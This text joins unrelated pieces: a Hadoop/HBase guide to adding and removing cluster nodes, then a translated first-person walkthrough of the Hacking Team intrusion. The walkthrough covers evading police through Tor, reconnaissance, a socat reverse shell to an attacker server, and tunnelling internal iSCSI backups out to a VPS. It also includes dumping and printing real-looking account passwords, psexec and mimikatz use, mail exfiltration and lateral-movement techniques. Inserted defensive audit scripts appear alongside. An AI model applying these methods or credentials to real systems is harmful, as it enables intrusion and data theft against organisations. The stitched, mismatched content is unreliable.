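Hot-adding and removing Hadoop nodes (including HBase)

Adding a node

1. Edit the hosts file
Same as for an ordinary datanode: add the namenode's IP.
2. Edit the namenode's configuration file conf/slaves
Add the IP or hostname of the new node.
3. Start the services on the new node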

[root@slave-004 hadoop]# ./bin/hadoop-daemon.sh start datanode
[root@slave-004 hadoop]# ./bin/hadoop-daemon.sh start tasktracker    # Hadoop 1
[root@slave-004 hadoop]# ./bin/yarn-daemon.sh start nodemanager      # Hadoop 2

4. Rebalance blocks

[root@slave-004 hadoop]# ./bin/start-balancer.sh

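1) If you do not rebalance, the cluster stores all new data on the new node, which lowers MapReduce efficiency.
2) Set the balancing threshold. The default is 10%; the lower the value, the more evenly the nodes are balanced, but the longer it takes.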

[root@slave-004 hadoop]# ./bin/start-balancer.sh -threshold 5

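3) Set the balancer bandwidth (in hdfs-site); the default is only 1 MB/s

<property>
<name>dfs.balance.bandwidthPerSec</name>
<value>1048576</value>
<description>
Specifies the maximum amount of bandwidth that each datanode
can utilize for the balancing purpose in term of
the number of bytes per second.
</description>
</property>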

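Notes:
1. Make sure the firewall on the slave is turned off;
2. Make sure the new slave's IP has been added to /etc/hosts on the master and on the other slaves, and conversely add the IPs of the master and the other slaves to /etc/hosts on the new slave.
3. If start-balancer.sh has finished and nothing has happened, set -threshold as low as possible; the lower the value, the more even the result and the less time it takes.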

start-balancer.sh -threshold 1

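HBase

If HBase also runs on the cluster, you need to deploy the HBase hserver as well.
5. On the HBase master, edit regionservers
vim /home/hadoop/hbase/conf/regionservers
Add the new node.
vim /home/hadoop/hbase/conf/hbase-site.xml
Add the new node to the hbase.zookeeper.quorum property.
6. Copy the two files above to every node
7. Start the HBase regionserver on the new node
hbase-daemon.sh start regionserver
8. Start the hbase shell on the HBase master
Use the status command to confirm the state of the cluster.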

Removing a node

1. Cluster configuration
Edit the conf/hdfs-site.xml file

<property>
<name>dfs.hosts.exclude</name>
<value>/data/soft/hadoop/conf/excludes</value>
<description>
Names a file that contains a list of hosts that are
not permitted to connect to the namenode.  The full pathname of the
file must be specified.  If the value is empty, no hosts are
excluded.
</description>
</property>

Edit the conf/mapred-site.xml file and add the following configuration:
<property>
<name>mapred.hosts.exclude</name>
<value>/opt/hadoop_conf/exclude_node</value>
</property>

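2. Identify the machines to decommission
The file named by dfs.hosts.exclude lists the machines to be taken offline, one per line. This prevents them from connecting to the namenode. For example: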

slave-003  
slave-004

3. Force a reload of the configuration

[root@master hadoop]# ./bin/hadoop dfsadmin  -refreshNodes

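This moves blocks in the background.
4. Shut down the nodes
Once the operation above has finished, the machines being decommissioned can be shut down safely.

[root@master hadoop]# ./bin/hadoop dfsadmin -report

This shows the nodes currently connected to the cluster.

While decommissioning is in progress, it shows:
Decommission Status : Decommission in progress

When it has finished, it shows:
Decommission Status : Decommissioned

5. Edit the excludes file again
Once the machines have been decommissioned, they can be removed from the excludes file.
Log in to a decommissioned machine and you will find that the DataNode process is gone but the TaskTracker is still running; it has to be dealt with by hand.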
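
The wait in step 4 can be gated on the report instead of checked by eye. The following is an added example, not part of the original post: it compares the excludes file against `dfsadmin -report` output and names every host that is not yet `Decommissioned`. The function names, the sample report and the `Name:`/`Hostname:` line layout are assumptions; the two status strings are the ones quoted above.

```shell
#!/bin/sh
# Added example: decide from `hadoop dfsadmin -report` output whether the hosts
# listed in the excludes file have finished decommissioning.

# pending_decommission EXCLUDES_FILE
# Reads a dfsadmin report on stdin. Prints, sorted, every host from the
# excludes file whose status is not yet "Decommissioned".
pending_decommission() {
    awk -v excludes="$1" '
        BEGIN {
            # Load the excludes file: one host per line, blank lines ignored.
            while ((getline line < excludes) > 0) {
                gsub(/^[ \t]+|[ \t\r]+$/, "", line)
                if (line != "") want[line] = 1
            }
            close(excludes)
        }
        # Assumed layout: each datanode block begins with "Name: host:port".
        /^Name:/ { node = $2; sub(/:[0-9]+$/, "", node) }
        # Assumed: some versions also print "Hostname: host"; prefer it.
        /^Hostname:/ { node = $2 }
        /^Decommission Status/ {
            status = $0
            sub(/^[^:]*:[ \t]*/, "", status)
            sub(/[ \t\r]+$/, "", status)
            seen[node] = status
        }
        END {
            for (h in want) {
                if (!(h in seen))
                    print h " (not in report, check manually)"
                else if (seen[h] != "Decommissioned")
                    print h " (" seen[h] ")"
            }
        }
    ' | sort
}

# safe_to_shutdown EXCLUDES_FILE
# Exit status 0 only when no excluded host is still pending.
safe_to_shutdown() {
    [ -z "$(pending_decommission "$1")" ]
}

# Constructed sample report (not captured from a real cluster).
sample_report() {
    cat <<'EOF'
Name: slave-002:50010
Decommission Status : Normal
Name: slave-003:50010
Decommission Status : Decommissioned
Name: slave-004:50010
Decommission Status : Decommission in progress
EOF
}

# Demo on the constructed report. On a live cluster, pipe in the real one:
#   ./bin/hadoop dfsadmin -report | pending_decommission /data/soft/hadoop/conf/excludes
demo_excludes=$(mktemp)
printf 'slave-003\nslave-004\n' > "$demo_excludes"
sample_report | pending_decommission "$demo_excludes"
rm -f "$demo_excludes"
```

A host that has dropped out of the report is listed as pending on purpose, so that a dead datanode is not mistaken for a finished decommission.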

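A hacker recounts the full Hacking Team intrusion (detailed walkthrough)

1. Preface

You may notice that, compared with the previous version, the content and language of this one have changed somewhat, because this will be the last version [1]. In the English-speaking world there are already many books, talks, guides and other material about hacking. In that world there are many hackers better than me, but they bury their talent and work for so-called "defense" contractors (the likes of Hacking Team) and intelligence agencies. Hacker culture was born in the United States as a counterculture, but it now retains only the charm of its essence; everything else has been assimilated. Going by the nature of a hacker, at least they can wear a T-shirt, dye their hair blue, use their hacker names and freely do what they like, and feel like rebels while they work for others (the Hacking Team types and intelligence agencies mentioned above).

The traditional way, you would have had to sneak into an office to get the documents [2], or rob a bank at gunpoint. Now all you need is a laptop, and you can do all of it lying in bed [3][4]. As the CNT said after the Gamma Group hack, "let's take a step forward with a new form of struggle" [5].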

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI

[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html

[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf

[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

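2. Hacking Team

Hacking Team is a company that helps governments hack and surveil journalists, activists, political opposition, and anything else that may pose a threat to the government; see [1][2][3][4][5][6][7][8][9][10][11]. Sometimes it also surveils criminals and terrorists [12]. Vincenzetti is the company's CEO, and the signature at the end of his emails often carries the fascist slogan "boia chi molla" (death to those who give up). He has long claimed to have technology that solves the "Tor problem" and the "darknet problem" [13]. On that point I keep my freedom of thought, and I very much doubt that the technology he talks about really works.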

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/

[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html

[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/

[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/

[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/

[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/

[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/

[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal

[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/

[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/

[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/

[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html

[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

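3. Be careful out there!

Unfortunately, our world is a mess. Some people get richer by doing bad things, while others are imprisoned for doing good. Fortunately, thanks to the people who have worked on the Tor Project, you can conceal yourself in the following ways:

(1) Encrypt your hard disk

I think you should not wait until the police come to seize your computer and then regret it too late; as the saying goes, one part prevention beats ten parts cure.

(2) Use a virtual machine and route your traffic through Tor. This achieves two things. First, all your connections are anonymized through Tor. Second, it keeps your personal life and your anonymous life (that is, real life and online life) on separate computers, which helps you avoid sometimes mixing the two up. You can also protect yourself with the anonymizing operating systems Whonix [3], Tails [4], Qubes TorVM [5], or other custom tools [6]. A more detailed description can be found at the numbered link [7].

(3) Do not connect to the Tor network directly (depending on circumstances)

Tor is not a panacea. The times at which you connect to Tor and the times at which you carry out your hacking can be correlated. There are, of course, also attacks that use Tor exit nodes [8]; alternatively you can connect to the network over someone else's Wi-Fi. Wifislax [9] is a Linux distribution with many tools for obtaining Wi-Fi. Another option is to connect to a VPN or a bridge node [10] before connecting to Tor, but this may be unsafe, because it allows the hacker's activity to be correlated with the network activity of their home (this was the reason Jeremy Hammond was charged, being used as evidence [11]). In practice, although Tor is imperfect, it still supports our work well. When I was young and reckless, I did many things (I mean hacking here) with no protection other than Tor, and the police were never able to investigate effectively; to this day I have had no problems.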

[1] https://www.torproject.org/

[2] https://info.securityinabox.org/es/chapter-4

[3] https://www.whonix.org/

[4] https://tails.boum.org/

[5] https://www.qubes-os.org/doc/privacy/torvm/

[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy

[7] https://www.whonix.org/wiki/Comparison_with_Others

[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/

[9] http://www.wifislax.com/

[10] https://www.torproject.org/docs/bridges.html.en

[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

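3.1 Infrastructure

When attacking, I do not attack directly from Tor exit nodes, because they are on blacklists, are slow, and cannot receive reverse connections. Tor is only for anonymity; I connect through it to the infrastructure used for the attack, which consists of:

(1) Domain names

Used to point to the C&C servers and to set up DNS tunnels for a safe exit.

(2) Stable servers

Serve as C&C servers that receive reverse shells, and also as a place from which to launch attacks and store the data obtained.

(3) Attack servers

Used for port scanning, for example scanning an entire network, or downloading a database through SQL injection, and so on.

3.2 Attribution

In the news we often see government hacking groups identified ("generally carrying out APTs"), because they always use the same tools, leave the same signatures, and even use the same infrastructure (domains, email addresses and so on). Because they can launch any attack without bearing any legal responsibility, they tend not to pay attention to this.

I did not want to make it too easy for law enforcement to trace what I did to Hacking Team. Working day and night as a black hat hacker, I used new servers and domain names, registered new email addresses, and paid with new bitcoin. During the intrusion I used only publicly released tools and tools written specifically for this attack. In doing so I changed my usual way of doing things, so as not to leave my signature.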

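4. Information gathering

Although it may be tedious, this step is very important, because the larger the attack surface, the easier it is to find a weakness in it.

4.1 Technical information

Tools and techniques needed:

(1) Google

A carefully constructed search query can turn up unexpected things, for example the identity of DPR [1]. "Google Hacking for Penetration Testers" [2] can serve as a reference; it is the bible of Google hacking.

(2) Subdomain enumeration

A company's main domain is usually hosted by a third party, and you will find the company's IP ranges through subdomains such as mx.company.com, ns1.company.com and the like. Sometimes these subdomains are "hidden" and not exposed on the network. Tools such as fierce [3], theHarvester [4] and recon-ng [5] can be used to enumerate subdomains.

(3) Whois lookups and reverse lookups

By running reverse lookups on a domain's whois information or on the company's IP ranges, you can find other domains and IP ranges belonging to the company. As far as I know, there is currently no free reverse whois lookup other than a Google hack, such as:

"via della moscova 13" site:www.findip-address.com

"via della moscova 13" site:domaintools.com

(4) Port scanning and fingerprinting

Among other techniques, you can also talk to the company's employees and get information from them. I put it in this section because it is not an attack, only a way of gathering information. The other part is port scanning: although the company's IDS (intrusion detection system) will detect port-scan events, do not worry, because the IDS itself produces many false positives, all of them alerts from inside, so your port scan will be drowned in a large volume of false positives.

For scanning, nmap is the most suitable and can identify most of the services it finds. Because a company covers a large range of IP addresses, zmap [7] and masscan [8] are the faster choice where efficiency matters; WhatWeb [9] and BlindElephant [10] can fingerprint websites.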

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html

[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf

[3] http://ha.ckers.org/fierce/

[4] https://github.com/laramies/theHarvester

[5] https://bitbucket.org/LaNMaSteR53/recon-ng

[6] https://nmap.org/

[7] https://zmap.io/

[8] https://github.com/robertdavidgraham/masscan

[9] http://www.morningstarsecurity.com/research/whatweb

[10] http://blindelephant.sourceforge.net/

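4.2 Social information

For social engineering, it is very useful to gather information about employees, job roles, means of communication, operating systems, plugins, software and so on.

(1) Google

Still the most useful tool.

(2) theHarvester and recon-ng

These two tools were mentioned in the previous section, but they have many more functions. With them you can find a lot of information quickly and automatically, and their manuals are worth reading.

(3) LinkedIn

You can find a lot of employee information here; the company's recruiters are the people most open to "interaction".

(4) Data.com

Like jigsaw, they hold a large amount of employee information.

(5) File metadata

You can find a lot of information about employees and their systems in the files a company publishes. Search for files on the company's website and extract their metadata; useful tools for this are metagoofil [1] and FOCA [2].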

[1] https://github.com/laramies/metagoofil

[2] https://www.elevenpaths.com/es/labstools/foca2/index.html

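5. Getting into the internal network

There are several ways into the internal network. The method used against Hacking Team is uncommon and more trouble than the usual ones, so I recommend first trying the common methods I describe next.

5.1 Social engineering

Social engineering, especially spear phishing, is behind most recent attacks. For an introduction in Spanish, see [1]. For more information published in English, see [2] (part three, "Targeted Attacks"). For amusing social engineering anecdotes from the past, see [3]. I did not want to try a phishing attack against Hacking Team, because part of their own business is helping governments phish their opponents. There would have been a high risk of Hacking Team recognizing it and being alerted.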

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html

[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/

[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

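5.2 Buying access

Thanks to hardworking Russians and their exploit kits and botnets. We all know, too, that many companies have some vulnerable machines on their networks. Almost all of the Fortune 500 have huge networks with some bots inside them. By comparison, Hacking Team is a fairly small company and most of its employees are information security experts, so the chance of a vulnerability in its internal network is relatively small.

5.3 Technical exploitation

After the Gamma Group hack, I arrived at a process for searching for vulnerabilities. A check shows that Hacking Team has the following public IP address range:

inetnum:        93.62.139.32 - 93.62.139.47
descr:          HT public subnet

But Hacking Team still had some contact with the public network. Unlike Gamma Group, Hacking Team's internet-facing site requires client authentication. From what I learned beforehand, it comprised a main website (a Joomla blog in which the Joomscan scanner found no vulnerabilities), a mail server, two routers, two VPN systems and a spam filtering system. So there were three options: find a 0day in Joomla, a 0day in the postfix mail system, or a 0day in one of the embedded systems. At this point, finding a 0day in an embedded system looked comparatively easy. After two weeks of reverse engineering I found a remote code execution vulnerability. Since the vulnerability has not yet been patched, in theory it can still be exploited, so I will not go into further detail here. For how to search for this type of vulnerability, see [3] and [4].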

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] http://sourceforge.net/projects/joomscan/

[3] http://www.devttys0.com/

[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

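6. Preparation

Before using the exploit against Hacking Team I did a lot of preparation and testing. I wrote a backdoored firmware and several post-exploitation tools for the embedded system. The purpose of the backdoor is to protect the exploit.

These are the post-exploitation tools I prepared:

(1) BusyBox

BusyBox is software that bundles more than a hundred of the most common Linux commands and tools. It includes simple tools such as ls, cat and echo, as well as larger and more complex ones such as grep, find, mount and telnet. It packs many Linux tools and commands together in compressed form, and also includes the shell that ships with Android.

(2) nmap

To scan and fingerprint Hacking Team's internal network.

(3) Responder.py

A man-in-the-middle script for internal networks and the most useful tool for attacking Windows when you have access to the internal network but no user account.

(4) Python

To run Responder.py.

(5) tcpdump

To sniff traffic.

(6) dsniff

For sniffing passwords from weak protocols (such as FTP) and for ARP spoofing. I would have preferred ettercap (written by Hacking Team's ALoR and NaGA), but it was hard to compile for the system.

(7) socat

A useful pty shell: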

my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
		  tcp:my_server:my_port

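This tool is a network Swiss Army knife, in the same class as netcat. Its defining feature is that it builds a bidirectional channel between two streams. socat supports many address types, including ip, tcp, udp, ipv6, pipe, exec, system, open, proxy, openssl and so on.

(8) screen

Like socat's pty shell, it is not strictly necessary, but it made me feel at home in Hacking Team's network. It is a tool for managing remote SSH sessions.

(9) A SOCKS5 proxy server

Used together with proxychains to access the internal network.

(10) tgcd

For port forwarding through the firewall.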

[1] https://www.busybox.net/

[2] https://nmap.org/

[3] https://github.com/SpiderLabs/Responder

[4] https://github.com/bendmorris/static-python

[5] http://www.tcpdump.org/

[6] http://www.monkey.org/~dugsong/dsniff/

[7] http://www.dest-unreach.org/socat/

[8] https://www.gnu.org/software/screen/

[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html

[10] http://tgcd.sourceforge.net/

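Before attacking, you need to think through what might happen. The worst thing I could foresee was that my backdoor or post-exploitation tools would make the system unstable, drawing the attention of staff and triggering an investigation. So I spent a week testing my exploit, backdoor and post-exploitation tools in the networks of other vulnerable companies of the same kind before entering Hacking Team's network.

7. Watch and listen

With the vulnerability and tools described above, I was now inside the internal network; I wanted to look around and think about what to do next. I switched Responder.py to analysis mode (-A, listen only, send no responses) and scanned slowly and at low frequency with nmap.

8. NoSQL databases

NoSQL, or rather no-authentication, databases are a great gift to hackers. Just when I was worried that all of MySQL's vulnerabilities might have been fixed [2][3][4][5], these new databases appeared, and their design turned out to have authentication flaws. Nmap found some of these databases in Hacking Team's internal network:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
|_    version = 2.6.5

These appear to be test instances used by RCS, Hacking Team's surveillance system. Audio intercepted by RCS is stored in MongoDB using GridFS. That is where the audio folder at link [6] comes from; it seems they were also spying on themselves.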

[1] https://www.shodan.io/search?query=product%3Amongodb

[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-20122122-a-tragically-comedic-security-flaw-in-mysql

[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html

[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c

[5] http://archives.neohapsis.com/archives/bugtraq/200002/0053.html

[6] https://ht.transparencytoolkit.org/audio/

9. Crossing network segments

The more amusing find was the monitored and captured webcam images of Hacking Team developing its malware, but that information was not very useful for the next step. Their insecure backups were the vulnerability we could use. According to the documentation [1], their iSCSI systems were supposed to be deployed on an isolated network, but nmap found some of them in the 192.168.1.200/24 subnet:

3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

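Because iSCSI requires a kernel module, it would have been difficult to compile it for the embedded system. Instead I forwarded the port so that I could mount it from a VPS (virtual private server):

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

iSCSI now finds the name iqn.2000-01.com.synology, but there is still a problem before it can be mounted, because it takes its address to be 192.168.200.72 and 127.0.0.1.

To solve this, run:

iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

Then run:

iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

Finally we mounted it successfully:

vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

Next I found backup files of several virtual machines. The Exchange mail server interested me most. It was too large to download, but we could still mount it remotely and search it for interesting records.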

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

In the directory

/mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311

we find the virtual machine's hard disk and mount it:

vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/

mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

At last we have reached the core: we can now see all the files of the old Exchange mail server.

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
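
A defender's check for the two exposures in sections 8 and 9 (databases and iSCSI backup targets that accept connections without authentication), added here as an example that is not part of the original write-up: it reads nmap output from a scan of your own network and lists every service nmap reports as needing no authentication. The function names are hypothetical and the sample scan, hostnames and addresses are constructed; it assumes the scan was run without credentials, so a `mongodb-databases` result with `ok = 1` means the listing succeeded unauthenticated.

```shell
#!/bin/sh
# Added example: audit nmap normal output (-oN) for services that answered
# without authentication, using the script output formats shown above.

# audit_noauth: read nmap output on stdin, print one line per finding:
#   <ip> <port> <finding> <detail>
audit_noauth() {
    awk '
        function emit(kind, detail,    key, h) {
            key = host SUBSEP port SUBSEP kind SUBSEP detail
            if (key in seen) return
            seen[key] = 1
            h = (host == "" ? "unknown-host" : host)
            print h, port, kind, detail
        }
        # New host block: remember its address, forget per-port state.
        /^Nmap scan report for / {
            host = $NF; gsub(/[()]/, "", host)
            port = ""; script = ""; target = "-"
            next
        }
        # New open port.
        /^[0-9]+\/(tcp|udp)[ \t]+open/ {
            split($1, p, "/"); port = p[1]
            script = ""; target = "-"
            next
        }
        # Script header line, e.g. "| iscsi-info:".
        /^\| [^ ]+:[ \t\r]*$/ {
            script = $2; sub(/:.*$/, "", script)
            next
        }
        # Script body lines.
        /^\|/ {
            if (script == "iscsi-info") {
                if ($2 == "Target:") target = $3
                if ($0 ~ /Authentication: No authentication required/)
                    emit("iscsi-noauth", target)
            } else if (script == "mongodb-databases") {
                if ($2 == "ok" && $3 == "=" && $4 == "1")
                    emit("mongodb-noauth", "-")
            }
            if ($1 == "|_") script = ""   # "|_" marks the last line of a script
        }
    '
}

# has_noauth: exit 0 if the scan on stdin contains at least one finding.
has_noauth() {
    [ -n "$(audit_noauth)" ]
}

# Constructed sample scan (not real hosts).
sample_scan() {
    cat <<'EOF'
Nmap scan report for db-test.example.internal (10.20.0.15)
27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 512
|_    version = 2.6.5

Nmap scan report for nas-backup.example.internal (10.20.0.72)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.example:nas-backup.name
|     Address: 10.20.0.72:3260,0
|_    Authentication: No authentication required

Nmap scan report for nas-prod.example.internal (10.20.0.73)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.example:nas-prod.name
|     Address: 10.20.0.73:3260,0
|_    Authentication: required
EOF
}

sample_scan | audit_noauth
```

Each finding is closed by turning on access control for the MongoDB instance or requiring CHAP and an initiator allow-list on the iSCSI target, and by keeping backup storage on a segment that user workstations and edge devices cannot reach.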

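10. From backups to domain administrator

What interested me most in the backups was finding a password or hash I could use to access the live servers. I ran pwdump, cachedump and lsadump [1] against the backed-up registry. Finally, lsadump turned up the password of the besadmin service account (belonging to the BlackBerry Enterprise Server):

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

Next I used proxychains on the embedded system together with smbclient to check the password:

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! besadmin's password was still valid, and it is a local admin account. Next I used my proxy and metasploit's psexec_psh module to get a meterpreter session. Then I migrated to a 64-bit process, ran "load kiwi" [5] and "creds_wdigest", and obtained a set of passwords.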


[1] https://github.com/Neohapsis/creddump7

[2] http://proxychains.sourceforge.net/

[3] https://www.samba.org/

[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf

[5] https://github.com/gentilkiwi/mimikatz

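11. Downloading the mail

Now that I had domain admin rights, I could reach the company's core information: its email. Since every use of a password increases the risk of detection, I downloaded the mail before browsing it. PowerShell makes this process easier. After getting the mail, it took a few weeks to get the source code and everything else, so I went in once more to download the new mail. Because the server was Italian, the date format is day/month/year. I used the following:

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

With New-MailboxExportRequest I downloaded the new mail (in this case, all the mail is from before June 5). The problem is that if the day is greater than 12 (because in the US the month usually comes first, and a month cannot be greater than 12), the date returned is invalid. It seems Microsoft's engineers only tested their software with their own regional settings.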

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

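12. Downloading files

Now that I had domain admin rights, I started downloading the shared files through my proxy with smbclient's -Tc option, for example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

13. Introduction to Windows domain administration

I want to pause here and share some material on attacking Windows networks.

13.1 Lateral movement

I will quickly recap the techniques for spreading within a Windows network. Remote execution techniques require a local administrator's password or hash to get started. Generally, the most common way to obtain these credentials is mimikatz [1], with the sekurlsa::logonpasswords and sekurlsa::msv modules mentioned above; after that you should be able to access machines with administrator rights. The most important privilege escalation tools are PowerUp [2] and bypassuac [3].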

[1] https://adsecurity.org/?page_id=1821

[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

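Remote techniques:

(1) psexec

A Windows network tool. You can use psexec [1], winexe [2], metasploit's psexec_psh module, PowerShell Empire's invoke_psexec [4], or the Windows command "sc" [5]. For the metasploit module, PowerShell Empire and pth-winexe [6], the hash alone is enough; no password is needed. This is the most universal method (it requires port 445 to be open), but it is also the least careful. In my experience it is never noticed during the attack, but afterwards investigators may find the traces it leaves and work out the hacker's path.

(2) WMI

The most careful method. The WMI service can be enabled on all computers except servers, because the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (for demos of wmiexec and pth-wmis, see [8]), PowerShell Empire's invoke_wmi module, or the Windows command wmic [5]. Apart from wmic, the rest require a hash.

(3) PSRemoting [10]

This feature is disabled by default, and I do not recommend using new protocols in the network environment. But if the administrator has enabled it, it is very convenient for us, especially since PowerShell can be used for almost anything. Although this changes in PowerShell 5 and Windows 10, PowerShell still makes many things easy today, such as evading antivirus detection and avoiding leaving more traces.

(4) Scheduled tasks

You can execute programs remotely with at and schtasks [5]. They work the same way as psexec and likewise leave known traces.

(5) GPO

If all of these protocols are disabled or blocked by the firewall but you are a domain admin, you can use GPO to push a logon script, install an msi, and run a scheduled task [13], or, as we saw on the computer of Mauro Romeo (Hacking Team's system administrator), use GPO to enable WMI and turn off firewall filtering.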

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx

[2] https://sourceforge.net/projects/winexe/

[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh

[4] http://www.powershellempire.com/?page_id=523

[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/

[6] https://github.com/byt3bl33d3r/pth-toolkit

[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

[8] https://www.trustedsec.com/june2015/no_psexec_needed/

[9] http://www.powershellempire.com/?page_id=124

[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/

[11] https://adsecurity.org/?p=2277

[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

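Local techniques:

(1) Token impersonation

Once you have administrator access to a computer, you can use other users' tokens to access resources in the domain. Two recommended tools for this are incognito [1] and mimikatz's "token::*" commands [2].

(2) MS14-068

You can exploit a vulnerability in the Kerberos protocol to generate a domain administrator credential.

(3) Pass the hash

If you have a user but that user has no usable session, you can use sekurlsa::pth [2] to obtain a credential for that user.

(4) Process injection

Any RAT can inject itself into another process, for example the migrate command in meterpreter and pupy [6], or psinject [7] in PowerShell Empire. You can use these tools or commands to inject into a process that holds the token you need.

(5) runas

runas lets a user run specified tools and programs with privileges other than those of the current logon, which is sometimes useful. The command is part of Windows; if you have no graphical interface, you can use PowerShell [8] instead.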

[1] https://www.indetectables.net/viewtopic.php?p=211165

[2] https://adsecurity.org/?page_id=1821

[3] https://github.com/bidord/pykek

[4] https://adsecurity.org/?p=676

[5] http://www.hackplayers.com/2014/12/CVE-20146324-como-validarse-con-cualquier-usuario-como-admin.html

[6] https://github.com/n1nj4sec/pupy

[7] http://www.powershellempire.com/?page_id=273

[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

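13.2 Persistence

Once you have access, you want to keep it. Keeping it going is a challenge for us. When you penetrate a company, you generally do not need persistence, because companies generally do not shut their machines down. For more on persistence, see [2][3][4]. But when penetrating a company you do not need it at all; it only increases the risk of detection.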

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/

